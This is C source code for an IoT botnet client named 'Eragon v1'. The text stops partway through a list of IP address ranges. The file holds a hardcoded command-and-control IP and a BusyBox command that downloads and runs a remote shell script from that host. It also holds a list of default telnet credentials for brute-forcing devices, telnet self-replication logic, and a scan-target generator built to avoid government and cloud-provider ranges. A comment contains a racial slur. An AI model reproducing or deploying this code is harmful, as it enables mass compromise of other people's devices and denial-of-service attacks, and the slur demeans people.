// Good STD Attack // Telnet Selfrep // HTTPHEX Attack #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define VERSION "Eragon v1" #define PAD_RIGHT 1 #define PAD_ZERO 2 #define PRINT_BUF_LEN 12 #define PR_SET_NAME 15 #define PHI 0x9e3779b9 #define CMD_IAC 255 #define CMD_WILL 251 #define CMD_WONT 252 #define CMD_DO 253 #define CMD_DONT 254 #define OPT_SGA 3 #define STD2_SIZE 65 #define STD_PIGZ 69 #define BUFFER_SIZE 1024 #define SERVER_LIST_SIZE (sizeof(ServerInfo) / sizeof(unsigned char *)) // Credit to Scar for all these Builds char *getBuild() { #if defined(__x86_64__) || defined(_M_X64) return "x86_64"; #elif defined(__i386) || defined(__i386__) || defined(_M_IX86) return "x86_32"; #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T) return "ARM-4"; #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_) return "ARM-5" #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_) || defined(__ARM_ARCH_6J_) || defined(__ARM_ARCH_6M_) return "ARM-6"; #elif defined(__ARM_ARCH_7_) || defined(__ARM_ARCH_7A__) || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) return "ARM-7"; #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips) return "MIPS"; #elif defined(__sh__) return "SUPERH"; #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC) return "POWERPC"; #else return "UNKNOWN"; #endif } char *getBuildz() { if(access("/usr/bin/python", F_OK) != -1){ return "SERVER"; } else { return "DEVICE"; } } const char *useragents[] = { "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0", "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1", "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4", "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201", "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911", "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)", "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7", "Mozilla/5.0 (PLAYSTATION 3; 3.55)", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2", "wii libnup/1.0", "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)", "PSP (PlayStation Portable); 2.00", "Bunjalloo/0.7.6(Nintendo DS;U;en)", "Doris/1.15 [en] (Symbian)", "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1", "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100", "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16", "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01", "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0", "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)", "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0", "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0", "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000", "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1" }; #define PRINTS // If you define you sir are a nigger #define Server_Botport 27 unsigned char *ServerInfo[] = {"185.52.1.73:27"}; char *BusyBoxPayload = "cd /tmp; /bin/busybox wget http://185.52.1.73/bins.sh -O - > jeSjax; /bin/busybox chmod 777 jeSjax; sh /tmp/jeSjax\r\n"; char *usernames[] = { "root\0", //root: "root\0", //root:admin "admin\0", //admin:admin "root\0", //root:default "volition\0", //volition:volition "daemon\0", // daemon:daemon "support\0" //support:support "supervisor\0", //supervisor:zyad1234 "root\0", //root:anko "guest\0", //guest:123456 "default\0", //default:default "telnet\0", //telnet:telnet "root\0", //root:root "root\0", //root:changeme "root\0", //root:hunt5759 "ubnt\0", //ubnt:ubnt "root\0", //root:5up "root\0", //root:password "root\0", //root:default "root\0", //root:changeme "root\0", //root:1234 "root\0", //root:xc3511 "root\0", //root:zsun1188 "root\0", //root:awind5885 "root\0", //root:hi3518 "root\0", //root:a6a7wimax "admin\0", //admin:radius "usuario\0", //usuario:usuario "user\0", //user:user "root\0", //root:calvin "admin\0", //admin:tech "admin\0", //admin:aquario "admin\0", //admin:asante "admin\0", // admin:vertex25ektks123 "admin\0", //admin:cat1029 "root\0", //root:vertex25ektks123 "root\0" //root:cat1029 }; char *passwords[] = { "\0", //root: "admin\0", // root:admin "admin\0", // admin:admin "default\0", // root:default "volition\0", //volition:volition "daemon\0", // daemon:daemon "support\0" //support:support "zyad1234\0", //supervisor:zyad1234 "anko\0", //root:anko "123456\0", //guest:123456 "default\0", //default:default "telnet\0", //telnet:telnet "root\0", //root:root "changeme\0", //root:changeme "hunt5759\0", //root:hunt5759 "ubnt\0", //ubnt:ubnt "5up\0", //root:5up "password\0", //root:password "default\0", //root:default "changeme\0", //root:changeme "1234\0", //root:1234 "xc3511\0", //root:xc3511 "zsun1188\0", //root:zsun1188 "awind5885\0", //root:awind5885 "hi3518\0", //root:hi3518 "a6a7wimax\0", //root:a6a7wimax "radius\0", //admin:radius "usuario\0", //usuario:usuario "user\0", //user:user "calvin\0", //root:calvin "tech\0", //admin:tech "aquario\0", //admin:aquario "asante\0", //admin:asante "vertex25ektks123\0", //admin:vertex25ektks123 "cat1029\0", //admin:cato1029 "vertex25ektks123\0", //root:vertex25ektks123 "cat1029\0" //root:cat1029 }; char *tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", "/opt/", (char*)0}; char *advances[] = {":", "ogin", "sername", "assword", (char*)0}; char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0}; char *successes[] = {"busybox", "$", "#", (char*)0}; char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0}; int botnetServer = -1; uint32_t *pids; uint32_t botnetPid; uint64_t numpids = 0; struct in_addr ourIP; struct in_addr ourPublicIP; unsigned char macAddress[6] = {0}; char *inet_ntoa(struct in_addr in); int KadenCommStock = 0; int botnetPrint(int sock, char *formatStr, ...); static uint32_t Q[4096], c = 362436; void init_rand(uint32_t x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (uint32_t)(t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } static uint32_t x, y, z, w; void rand_init(void) { x = time(NULL); y = getpid() ^ getppid(); z = clock(); w = z ^ y; } uint32_t rand_next(void) { uint32_t t = x; t ^= t << 11; t ^= t >> 8; x = y; y = z; z = w; w ^= w >> 19; w ^= t; return w; } void rand_str(char *str, int len) { while (len > 0) { if (len >= 4) { *((uint32_t *)str) = rand_next(); str += sizeof (uint32_t); len -= sizeof (uint32_t); } else if (len >= 2) { *((uint16_t *)str) = rand_next() & 0xFFFF; str += sizeof (uint16_t); len -= sizeof (uint16_t); } else { *str++ = rand_next() & 0xFF; len--; } } } void rand_alphastr(uint8_t *str, int len) { const char alphaset[] = "kt8lmno5abghiiosdf63rlrs83rs9j0"; //keep this as is (randomize everytime you recompile) while (len > 0) { if (len >= sizeof (uint32_t)) { int i; uint32_t entropy = rand_next(); for (i = 0; i < sizeof (uint32_t); i++) { uint8_t tmp = entropy & 0xff; entropy = entropy >> 8; tmp = tmp >> 3; *str++ = alphaset[tmp]; } len -= sizeof (uint32_t); } else { *str++ = rand_next() % (sizeof (alphaset)); len--; } } } int util_strlen(char *str) { int c = 0; while (*str++ != 0) c++; return c; } void util_memcpy(void *dst, void *src, int len) { char *r_dst = (char *)dst; char *r_src = (char *)src; while (len--) *r_dst++ = *r_src++; } int util_strcpy(char *dst, char *src) { int l = util_strlen(src); util_memcpy(dst, src, l + 1); return l; } static void printchar(unsigned char **str, int c) { if (str) { **str = c; ++(*str); } else (void)write(1, &c, 1); } unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd) { int got = 1, total = 0; while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; } return got == 0 ? NULL : buffer; } static int prints(unsigned char **out, const unsigned char *string, int width, int pad) { register int pc = 0, padchar = ' '; if (width > 0) { register int len = 0; register const unsigned char *ptr; for (ptr = string; *ptr; ++ptr) ++len; if (len >= width) width = 0; else width -= len; if (pad & PAD_ZERO) padchar = '0'; } if (!(pad & PAD_RIGHT)) { for ( ; width > 0; --width) { printchar (out, padchar); ++pc; } } for ( ; *string ; ++string) { printchar (out, *string); ++pc; } for ( ; width > 0; --width) { printchar (out, padchar); ++pc; } return pc; } static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) { unsigned char print_buf[PRINT_BUF_LEN]; register unsigned char *s; register int t, neg = 0, pc = 0; register unsigned int u = i; if (i == 0) { print_buf[0] = '0'; print_buf[1] = '\0'; return prints (out, print_buf, width, pad); } if (sg && b == 10 && i < 0) { neg = 1; u = -i; } s = print_buf + PRINT_BUF_LEN-1; *s = '\0'; while (u) { t = u % b; if( t >= 10 ) t += letbase - '0' - 10; *--s = t + '0'; u /= b; } if (neg) { if( width && (pad & PAD_ZERO) ) { printchar (out, '-'); ++pc; --width; } else { *--s = '-'; } } return pc + prints (out, s, width, pad); } static int print(unsigned char **out, const unsigned char *format, va_list args ) { register int width, pad; register int pc = 0; unsigned char scr[2]; for (; *format != 0; ++format) { if (*format == '%') { ++format; width = pad = 0; if (*format == '\0') break; if (*format == '%') goto out; if (*format == '-') { ++format; pad = PAD_RIGHT; } while (*format == '0') { ++format; pad |= PAD_ZERO; } for ( ; *format >= '0' && *format <= '9'; ++format) { width *= 10; width += *format - '0'; } if( *format == 's' ) { register char *s = (char *)va_arg( args, intptr_t ); pc += prints (out, s?s:"(null)", width, pad); continue; } if( *format == 'd' ) { pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a'); continue; } if( *format == 'x' ) { pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a'); continue; } if( *format == 'X' ) { pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A'); continue; } if( *format == 'u' ) { pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a'); continue; } if( *format == 'c' ) { scr[0] = (unsigned char)va_arg( args, int ); scr[1] = '\0'; pc += prints (out, scr, width, pad); continue; } } else { out: printchar (out, *format); ++pc; } } if (out) **out = '\0'; va_end( args ); return pc; } int szprintf(unsigned char *out, const unsigned char *format, ...) { va_list args; va_start( args, format ); return print( &out, format, args ); } int botnetPrint(int sock, char *formatStr, ...) { unsigned char *textBuffer = malloc(2048); memset(textBuffer, 0, 2048); char *orig = textBuffer; va_list args; va_start(args, formatStr); print(&textBuffer, formatStr, args); va_end(args); orig[strlen(orig)] = '\n'; int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL); free(orig); return q; } void trim(char *str) { int i; int begin = 0; int end = strlen(str) - 1; while (isspace(str[begin])) begin++; while ((end >= begin) && isspace(str[end])) end--; for (i = begin; i <= end; i++) str[i - begin] = str[i]; str[i - begin] = '\0'; } int getHost(unsigned char *toGet, struct in_addr *i) { struct hostent *h; if((i->s_addr = inet_addr(toGet)) == -1) return 1; return 0; } int recvLine(int socket, unsigned char *buf, int bufsize) { memset(buf, 0, bufsize); fd_set myset; struct timeval tv; tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET(socket, &myset); int selectRtn, retryCount; if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) { while(retryCount < 10) { tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET(socket, &myset); if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) { retryCount++; continue; } break; } } unsigned char tmpchr; unsigned char *cp; int count = 0; cp = buf; while(bufsize-- > 1) { if(recv(KadenCommStock, &tmpchr, 1, 0) != 1) { *cp = 0x00; return -1; } *cp++ = tmpchr; if(tmpchr == '\n') break; count++; } *cp = 0x00; return count; } int connectTimeout(int fd, char *host, int port, int timeout) { struct sockaddr_in dest_addr; fd_set myset; struct timeval tv; socklen_t lon; int valopt; long arg = fcntl(fd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(fd, F_SETFL, arg); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(port); if(getHost(host, &dest_addr.sin_addr)) return 0; memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); if (res < 0) { if (errno == EINPROGRESS) { tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET(fd, &myset); if (select(fd+1, NULL, &myset, NULL, &tv) > 0) { lon = sizeof(int); getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) return 0; } else return 0; } else return 0; } arg = fcntl(fd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(fd, F_SETFL, arg); return 1; } int listFork() { uint32_t parent, *newpids, i; parent = fork(); if (parent <= 0) return parent; numpids++; newpids = (uint32_t*)malloc((numpids + 1) * 4); for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i]; newpids[numpids - 1] = parent; free(pids); pids = newpids; return parent; } struct telstate_t { int fd; unsigned int ip; unsigned char state; unsigned char complete; unsigned char usernameInd; unsigned char passwordInd; unsigned char tempDirInd; unsigned int totalTimeout; unsigned short bufUsed; char *sockbuf; }; const char* get_telstate_host(struct telstate_t* telstate) { struct in_addr in_addr_ip; in_addr_ip.s_addr = telstate->ip; return inet_ntoa(in_addr_ip); } int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) { int num_bytes, i; memset(buffer, 0, buf_size); num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size); if(buffer[0] == 0xFF) { negotiate(fd, buffer, 3); } if(contains_string(buffer, strings)) { return 1; } return 0; } int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) { fd_set read_set; struct timeval tv; tv.tv_sec = 0; tv.tv_usec = timeout_usec; FD_ZERO(&read_set); FD_SET(fd, &read_set); if (select(fd+1, &read_set, NULL, NULL, &tv) < 1) return 0; return recv(fd, buffer, buf_size, 0); } void advance_state(struct telstate_t* telstate, int new_state) { if(new_state == 0) { close(telstate->fd); } telstate->totalTimeout = 0; telstate->state = new_state; memset((telstate->sockbuf), 0, BUFFER_SIZE); } void reset_telstate(struct telstate_t* telstate) { advance_state(telstate, 0); telstate->complete = 1; } int contains_success(char* buffer) { return contains_string(buffer, successes); } int contains_fail(char* buffer) { return contains_string(buffer, fails); } int contains_response(char* buffer) { return contains_success(buffer) || contains_fail(buffer); } int contains_string(char* buffer, char** strings) { int num_strings = 0, i = 0; for(num_strings = 0; strings[++num_strings] != 0; ); for(i = 0; i < num_strings; i++) { if(strcasestr(buffer, strings[i])) { return 1; } } return 0; } int negotiate(int sock, unsigned char *buf, int len) { unsigned char c; switch (buf[1]) { case CMD_IAC: return 0; case CMD_WILL: case CMD_WONT: case CMD_DO: case CMD_DONT: c = CMD_IAC; send(sock, &c, 1, MSG_NOSIGNAL); if (CMD_WONT == buf[1]) c = CMD_DONT; else if (CMD_DONT == buf[1]) c = CMD_WONT; else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO); else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT); send(sock, &c, 1, MSG_NOSIGNAL); send(sock, &(buf[2]), 1, MSG_NOSIGNAL); break; default: break; } return 0; } int matchPrompt(char *bufStr) { char *prompts = ":>%$#\0"; int bufLen = strlen(bufStr); int i, q = 0; for(i = 0; i < strlen(prompts); i++) { while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++; if(*(bufStr + bufLen - q) == prompts[i]) return 1; } return 0; } int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex) { int bufferUsed = initialIndex, got = 0, found = 0; fd_set myset; struct timeval tv; tv.tv_sec = timeout; tv.tv_usec = timeoutusec; unsigned char *initialRead = NULL; while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0)) { FD_ZERO(&myset); FD_SET(fd, &myset); if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break; initialRead = buffer + bufferUsed; got = recv(fd, initialRead, 1, 0); if(got == -1 || got == 0) return 0; bufferUsed += got; if(*initialRead == 0xFF) { got = recv(fd, initialRead + 1, 2, 0); if(got == -1 || got == 0) return 0; bufferUsed += got; if(!negotiate(fd, initialRead, 3)) return 0; } else { if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; } } } if(found) return 1; return 0; } in_addr_t GIP() { //Like my ipstates? static uint8_t ipState[4] = {0}; ipState[0] = rand() % 223; ipState[1] = rand() % 255; ipState[2] = rand() % 255; ipState[3] = rand() % 255; while( (ipState[0] == 127) || //Loopback (ipState[0] == 0) || //Invalid address space (ipState[0] == 3) || //General Electric Company (ipState[0] == 15) || //Hewlett-Packard Company (ipState[0] == 56) || //US Postal Service (ipState[0] == 10) || //Internal network (ipState[0] == 25) || //Some more (ipState[0] == 49) || //Some more (ipState[0] == 50) || //Some more (ipState[0] == 137) || //Some more (ipState[0] == 6) || //Department of Defense (ipState[0] == 7) || //Department of Defense (ipState[0] == 11) || //Department of Defense (ipState[0] == 21) || //Department of Defense (ipState[0] == 22) || //Department of Defense (ipState[0] == 26) || //Department of Defense (ipState[0] == 28) || //Department of Defense (ipState[0] == 29) || //Department of Defense (ipState[0] == 30) || //Department of Defense (ipState[0] == 33) || //Department of Defense (ipState[0] == 55) || //Department of Defense (ipState[0] == 214) || //Department of Defense (ipState[0] == 215) || //Department of Defense (ipState[0] == 192 && ipState[1] == 168) || //Internal network (ipState[0] == 146 && ipState[1] == 17) || //Internal network (ipState[0] == 146 && ipState[1] == 80) || //IANA NAT reserved (ipState[0] == 146 && ipState[1] == 98) || //IANA NAT reserved (ipState[0] == 146 && ipState[1] == 154) || //IANA Special use (ipState[0] == 147 && ipState[1] == 159) || //Some more (ipState[0] == 148 && ipState[1] == 114) || //Some more (ipState[0] == 150 && ipState[1] == 125) || //Some more (ipState[0] == 150 && ipState[1] == 133) || //Some more (ipState[0] == 150 && ipState[1] == 144) || //Some more (ipState[0] == 150 && ipState[1] == 149) || //Some more (ipState[0] == 150 && ipState[1] == 157) || //Some more (ipState[0] == 150 && ipState[1] == 184) || //Some more (ipState[0] == 150 && ipState[1] == 190) || //Some more (ipState[0] == 150 && ipState[1] == 196) || //Some more (ipState[0] == 152 && ipState[1] == 82) || //Some more (ipState[0] == 152 && ipState[1] == 229) || //Some more (ipState[0] == 157 && ipState[1] == 202) || //Some more (ipState[0] == 157 && ipState[1] == 217) || //Some more (ipState[0] == 161 && ipState[1] == 124) || //Some more (ipState[0] == 162 && ipState[1] == 32) || //Some more (ipState[0] == 155 && ipState[1] == 96) || //Some more (ipState[0] == 155 && ipState[1] == 149) || //Some more (ipState[0] == 155 && ipState[1] == 155) || //Some more (ipState[0] == 155 && ipState[1] == 178) || //Some more (ipState[0] == 164 && ipState[1] == 158) || //Some more (ipState[0] == 156 && ipState[1] == 9) || //Some more (ipState[0] == 167 && ipState[1] == 44) || //Some more (ipState[0] == 168 && ipState[1] == 68) || //Some more (ipState[0] == 168 && ipState[1] == 85) || //Some more (ipState[0] == 168 && ipState[1] == 102) || //Some more (ipState[0] == 203 && ipState[1] == 59) || //Some more (ipState[0] == 204 && ipState[1] == 34) || //Some more (ipState[0] == 207 && ipState[1] == 30) || //Some more (ipState[0] == 117 && ipState[1] == 55) || //Some more (ipState[0] == 117 && ipState[1] == 56) || //Some more (ipState[0] == 80 && ipState[1] == 235) || //Some more (ipState[0] == 207 && ipState[1] == 120) || //Some more (ipState[0] == 209 && ipState[1] == 35) || //Some more (ipState[0] == 64 && ipState[1] == 70) || //Some more (ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || //Some more (ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || //Some more (ipState[0] == 169 && ipState[1] == 254) || //Some more (ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || //Some more (ipState[0] == 64 && ipState[1] >= 69 && ipState[1] < 227) || //Some more (ipState[0] == 128 && ipState[1] >= 35 && ipState[1] < 237) || //Some more (ipState[0] == 129 && ipState[1] >= 22 && ipState[1] < 255) || //Some more (ipState[0] == 130 && ipState[1] >= 40 && ipState[1] < 168) || //Some more (ipState[0] == 131 && ipState[1] >= 3 && ipState[1] < 251) || //Some more (ipState[0] == 132 && ipState[1] >= 3 && ipState[1] < 251) || //Some more (ipState[0] == 134 && ipState[1] >= 5 && ipState[1] < 235) || //Some more (ipState[0] == 136 && ipState[1] >= 177 && ipState[1] < 223) || //Some more (ipState[0] == 138 && ipState[1] >= 13 && ipState[1] < 194) || //Some more (ipState[0] == 139 && ipState[1] >= 31 && ipState[1] < 143) || //Some more (ipState[0] == 140 && ipState[1] >= 1 && ipState[1] < 203) || //Some more (ipState[0] == 143 && ipState[1] >= 45 && ipState[1] < 233) || //Some more (ipState[0] == 144 && ipState[1] >= 99 && ipState[1] < 253) || //Some more (ipState[0] == 146 && ipState[1] >= 165 && ipState[1] < 166) || //Some more (ipState[0] == 147 && ipState[1] >= 35 && ipState[1] < 43) || //Some more (ipState[0] == 147 && ipState[1] >= 103 && ipState[1] < 105) || //Some more (ipState[0] == 147 && ipState[1] >= 168 && ipState[1] < 170) || //Some more (ipState[0] == 147 && ipState[1] >= 198 && ipState[1] < 200) || //Some more (ipState[0] == 147 && ipState[1] >= 238 && ipState[1] < 255) || //Some more (ipState[0] == 150 && ipState[1] >= 113 && ipState[1] < 115) || //Some more (ipState[0] == 152 && ipState[1] >= 151 && ipState[1] < 155) || //Some more (ipState[0] == 153 && ipState[1] >= 21 && ipState[1] < 32) || //Some more (ipState[0] == 155 && ipState[1] >= 5 && ipState[1] < 10) || //Some more (ipState[0] == 155 && ipState[1] >= 74 && ipState[1] < 89) || //Some more (ipState[0] == 155 && ipState[1] >= 213 && ipState[1] < 222) || //Some more (ipState[0] == 157 && ipState[1] >= 150 && ipState[1] < 154) || //Some more (ipState[0] == 158 && ipState[1] >= 1 && ipState[1] < 21) || //Some more (ipState[0] == 158 && ipState[1] >= 235 && ipState[1] < 247) || //Some more (ipState[0] == 159 && ipState[1] >= 120 && ipState[1] < 121) || //Some more (ipState[0] == 160 && ipState[1] >= 132 && ipState[1] < 151) || //Some more (ipState[0] == 64 && ipState[1] >= 224 && ipState[1] < 227) || //Some more (ipState[0] == 162 && ipState[1] >= 45 && ipState[1] < 47) || //CIA (ipState[0] == 163 && ipState[1] >= 205 && ipState[1] < 207) || //NASA Kennedy Space Center (ipState[0] == 164 && ipState[1] >= 45 && ipState[1] < 50) || //NASA Kennedy Space Center (ipState[0] == 164 && ipState[1] >= 217 && ipState[1] < 233) || //NASA Kennedy Space Center (ipState[0] == 169 && ipState[1] >= 252 && ipState[1] < 254) || //U.S. Department of State (ipState[0] == 199 && ipState[1] >= 121 && ipState[1] < 254) || //Naval Air Systems Command, VA (ipState[0] == 205 && ipState[1] >= 1 && ipState[1] < 118) || //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR (ipState[0] == 207 && ipState[1] >= 60 && ipState[1] < 62) || //FBI controlled Linux servers & IPs/IP-Ranges (ipState[0] == 104 && ipState[1] >= 16 && ipState[1] < 31) || //Cloudflare (ipState[0] == 188 && ipState[1] == 166) || //Digital Ocean (ipState[0] == 188 && ipState[1] == 226) || //Digital Ocean (ipState[0] == 159 && ipState[1] == 203) || //Digital Ocean (ipState[0] == 162 && ipState[1] == 243) || //Digital Ocean (ipState[0] == 45 && ipState[1] == 55) || //Digital Ocean (ipState[0] == 178 && ipState[1] == 62) || //Digital Ocean (ipState[0] == 104 && ipState[1] == 131) || //Digital Ocean (ipState[0] == 104 && ipState[1] == 236) || //Digital Ocean (ipState[0] == 107 && ipState[1] == 170) || //Digital Ocean (ipState[0] == 138 && ipState[1] == 197) || //Digital Ocean (ipState[0] == 138 && ipState[1] == 68) || //Digital Ocean (ipState[0] == 139 && ipState[1] == 59) || //Digital Ocean (ipState[0] == 146 && ipState[1] == 185 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean (ipState[0] == 163 && ipState[1] == 47 && ipState[2] >= 10 && ipState[2] < 11) || //Digital Ocean (ipState[0] == 174 && ipState[1] == 138 && ipState[2] >= 1 && ipState[2] < 127) || //Digital Ocean (ipState[0] == 192 && ipState[1] == 241 && ipState[2] >= 128 && ipState[2] < 255) || //Digital Ocean (ipState[0] == 198 && ipState[1] == 199 && ipState[2] >= 64 && ipState[2] < 127) || //Digital Ocean (ipState[0] == 198 && ipState[1] == 211 && ipState[2] >= 96 && ipState[2] < 127) || //Digital Ocean (ipState[0] == 207 && ipState[1] == 154 && ipState[2] >= 192 && ipState[2] < 255) || //Digital Ocean (ipState[0] == 37 && ipState[1] == 139 && ipState[2] >= 1 && ipState[2] < 31) || //Digital Ocean (ipState[0] == 67 && ipState[1] == 207 && ipState[2] >= 64 && ipState[2] < 95) || //Digital Ocean (ipState[0] == 67 && ipState[1] == 205 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean (ipState[0] == 80 && ipState[1] == 240 && ipState[2] >= 128 && ipState[2] < 143) || //Digital Ocean (ipState[0] == 82 && ipState[1] == 196 && ipState[2] >= 1 && ipState[2] < 15) || //Digital Ocean (ipState[0] == 95 && ipState[1] == 85 && ipState[2] >= 8 && ipState[2] < 63) || //Digital Ocean (ipState[0] == 64 && ipState[1] == 237 && ipState[2] >= 32 && ipState[2] < 43) || //Choopa & Vultr (ipState[0] == 185 && ipState[1] == 92 && ipState[2] >= 220 && ipState[2] < 223) || //Choopa & Vultr (ipState[0] == 104 && ipState[1] == 238 && ipState[2] >= 128 && ipState[2] < 191) || //Choopa & Vultr (ipState[0] == 209 && ipState[1] == 222 && ipState[2] >= 1 && ipState[2] < 31) || //Choopa & Vultr (ipState[0] == 208 && ipState[1] == 167 && ipState[2] >= 232 && ipState[2] < 252) || //Choopa & Vultr (ipState[0] == 66 && ipState[1] == 55 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr (ipState[0] == 45 && ipState[1] == 63 && ipState[2] >= 1 && ipState[2] < 127) || //Choopa & Vultr (ipState[0] == 216 && ipState[1] == 237 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr (ipState[0] == 108 && ipState[1] == 61) || //Choopa & Vultr (ipState[0] == 45 && ipState[1] == 76) || //Choopa & Vultr (ipState[0] == 185 && ipState[1] == 11 && ipState[2] >= 144 && ipState[2] < 148) || //Blazingfast & Nforce (ipState[0] == 185 && ipState[1] == 56 && ipState[2] >= 21 && ipState[2] < 23) || //Blazingfast & Nforce (ipState[0] == 185 && ipState[1] == 61 && ipState[2] >= 136 && 